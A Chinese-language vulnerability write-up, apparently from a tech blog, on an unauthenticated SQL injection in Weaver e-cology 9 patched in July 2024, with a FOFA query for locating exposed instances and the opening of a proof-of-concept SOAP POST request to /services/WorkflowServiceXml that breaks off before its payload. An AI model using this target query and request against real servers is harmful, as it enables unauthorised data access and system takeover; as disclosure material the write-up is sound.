0
点赞
收藏
分享

微信扫一扫

The Web3 社区 Web3 产品经理课程

小贴贴纸happy 2024-07-24 阅读 33

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞。

漏洞成因

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

漏洞影响

攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

0x03 影响范围

e-cology 9 < 补丁版本 2024-07-10

0x04 复现环境

FOFA:app="泛微-OA(e-cology)"

0x05 漏洞复现

PoC

POST /services/WorkflowServiceXml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: text/xml
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/&#
举报

相关推荐

CTFshow WEB web3

Web3 详解

什么是 web3?

web3: 智能合约

CTFshow-Web入门-Web3

0 条评论